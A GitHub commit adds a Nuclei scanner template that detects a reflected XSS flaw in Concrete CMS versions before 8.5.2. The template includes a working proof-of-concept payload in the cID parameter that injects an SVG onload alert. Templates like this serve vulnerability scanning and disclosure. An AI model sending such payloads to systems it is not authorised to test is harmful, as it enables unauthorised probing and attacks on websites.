Merge pull request #1413 from projectdiscovery/concrete-xss

Adding concrete-xss
patch-1
Sandeep Singh 2021-05-04 13:38:28 +05:30 committed by GitHub
commit 82a7496b6a
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 33 additions and 0 deletions

View File

@ -0,0 +1,33 @@
id: concrete-xss
info:
author: shifacyclewla,hackergautam
description: The Concrete CMS < 8.5.2 is vulnerable to Reflected XSS using cID parameter.
name: Unauthenticated reflected XSS in preview_as_user function
severity: medium
tags: concrete,xss,cms
reference: |
- https://hackerone.com/reports/643442
- https://github.com/concrete5/concrete5/pull/7999
- https://twitter.com/JacksonHHax/status/1389222207805661187
requests:
- method: GET
path:
- '{{BaseURL}}/ccm/system/panels/page/preview_as_user/preview?cID="></iframe><svg/onload=alert("{{randstr}}")>'
matchers-condition: and
matchers:
- type: word
part: body
words:
- '</iframe><svg/onload=alert("{{randstr}}")>'
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200